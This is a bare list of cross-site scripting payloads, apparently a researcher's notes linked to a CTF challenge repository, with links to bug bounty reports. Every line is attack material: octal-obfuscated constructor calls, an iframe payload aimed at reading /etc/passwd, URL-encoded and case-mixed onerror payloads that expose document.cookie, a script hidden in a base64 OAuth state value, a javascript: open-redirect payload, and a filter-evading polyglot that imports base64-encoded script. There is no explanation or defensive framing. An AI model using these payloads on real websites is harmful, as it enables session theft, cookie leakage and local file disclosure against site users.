https://github.com/memzer0x/CTF-Challenges/tree/6fb8b6ed38ac47fec3c46425e531b433e48980e6/CTF-WEB/xssChallenge\
(()=>{})["\\143\\157\\156\\163\\164\\162\\165\\143\\164\\157\\162"]("\\141\\154\\145\\162\\164()")()
XSS to LFI payload :-
<img src=x onerror="document.write('<iframe src=file:///etc/passwd></iframe>')">
<iframe srcdoc="<script>alert('XSS')</script>"></iframe>
"%3e%3cImG%20sRC=X%20OneRRoR=alert(document.cookie)%20"%3c
oauth -
&state=eyJhY3Rpb24iOiJtb2JpbGUiLCJyZWRpcmVjdF90byI6InRlc3RcIj48c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmRvbWFpbik8L3NjcmlwdD4ifQ==
https://████/logout_redirect.do?sysparm_url=//j\\\\javascript%3Aalert(document.domain)
mass inject payload - https://bugbounty.zip/RapidHand.html
https://hackenproof.com/reports/DEE-70
https://hackenproof.com/reports/DEE-68
https://blog.pksecurity.io/2023/10/04/microsoft-office.html
javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie
</base</sTyle/</scRIpt/</textArea/</noScript/</tiTle/--><h1/<h1><image/onerror="import('data:application/javascript;charset=utf-8;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKTtjb25zb2xlLmxvZyhkb2N1bWVudC5kb21haW4pOy8v')//%27"src><script>
